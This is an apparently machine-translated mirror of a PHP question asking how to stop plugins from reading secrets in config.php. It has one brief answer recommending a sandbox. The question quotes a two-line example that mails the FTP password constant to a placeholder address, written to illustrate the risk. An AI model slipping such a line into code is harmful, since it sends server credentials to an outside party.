簡體 English 中英

如何防止插件訪問配置文件

[英]how to prevent plugin from accessing config files

原文 2016-06-17 16:23:01 0 1 php

我正在編寫一個支持使用插件的應用程序，可以將其掛鈎到管理員。

我如何保護配置文件，因為當前，如果插件開發人員編寫：

$msg=__FTP_PASS__; 

mail("email@email","subject",$msg);

該消息與密碼一起發送。 我如何防止這種情況發生，因為這是因為我在管理頁面的頂部包含了“ config.php”。 謝謝。 #am抱歉，我不知道如何在stackoverf上格式化問題

1 個解決方案

您可以使用某種PHP沙箱來防止這種情況發生（想到Runkit的Runkit_Sandbox類），但這不是PHP的標准部分，正確使用它也不是一件容易的事。

讓用戶運行任意代碼絕不是一個好主意。

如何防止用戶訪問服務器上的文件？

[英]How to prevent users from accessing files on server?

如何防止用戶直接從url訪問文件？

[英]How to prevent users from accessing files directly from url?

如何防止用戶訪問包含文件？

[英]How can I prevent users from accessing include files?

從插件的配置文件訪問CI的配置文件

[英]Accessing CI's config file from a plugin's config file

如何防止用戶訪問管理頁面

[英]How to prevent users from accessing admin pages

通過直接輸入來阻止用戶訪問php文件

[英]Prevent users from accessing php files by typing it directly

防止人們訪問您的課程並直接包含文件

[英]Prevent people from accessing your classes and include files directly

如何隱藏配置文件以防止直接訪問？

[英]How to hide config files from direct access?

在請求期間訪問新的 Laravel 配置文件

[英]Accessing new Laravel config files during request

如何防止從另一個客戶端包含數據庫 config.php？

[英]How to prevent including database config.php from another client?

暫無

暫無

聲明:本站的技術帖子網頁，遵循CC BY-SA 4.0協議，如果您需要轉載，請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.

相關問題 如何防止用戶訪問服務器上的文件？如何防止用戶直接從url訪問文件？如何防止用戶訪問包含文件？從插件的配置文件訪問CI的配置文件如何防止用戶訪問管理頁面通過直接輸入來阻止用戶訪問php文件防止人們訪問您的課程並直接包含文件如何隱藏配置文件以防止直接訪問？在請求期間訪問新的 Laravel 配置文件如何防止從另一個客戶端包含數據庫 config.php？

相關標簽

粵ICP備18138465號 © 2020-2024 STACKOOM.COM